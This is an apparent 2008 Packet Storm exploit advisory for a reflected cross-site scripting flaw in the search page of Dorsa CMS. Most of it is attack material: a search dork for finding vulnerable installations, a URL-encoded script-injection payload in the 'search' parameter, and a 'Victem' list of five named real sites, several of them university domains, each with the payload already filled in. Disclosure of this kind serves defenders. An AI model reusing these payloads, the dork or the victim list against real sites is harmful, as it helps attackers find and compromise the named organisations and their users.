dorsacms-xss.txt

2008-10-29T00:00:00
ID PACKETSTORM:71330
Type packetstorm
Reporter Pouya Server
Modified 2008-10-29T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: Dorsa CMS  
Vendor : http://www.dorsacms.com  
Dork: Powered by DorsaCms  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : XSS (Cross site scripting)  
---------------------------------------------------------  
#########################################################  
  
http://www.site.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E  
  
---------------------------------  
  
Victem :  
http://www.dorsacms.com/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E  
http://www.iauksh.ac.ir/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E  
http://www.iaun.ac.ir/cms/dorsa/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_server%27%29%3C%2Fscript%3E  
http://iaumajlesi.ac.ir/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_server%27%29%3C%2Fscript%3E  
http://bsiesfahan.ir/Default_.aspx?lang=1&sub=0&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_server%27%29%3C%2Fscript%3E  
  
  
  
`